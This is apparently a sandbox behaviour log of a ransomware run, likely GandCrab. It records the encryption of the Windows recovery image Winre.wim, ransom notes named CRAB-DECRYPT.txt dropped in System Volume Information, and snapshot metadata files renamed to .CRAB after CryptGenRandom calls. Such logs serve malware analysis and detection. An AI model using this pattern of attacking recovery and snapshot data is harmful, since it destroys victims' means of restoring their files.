File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 393234 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 393248 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 256 True 2
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2456 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 2464 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2288 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 2288 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
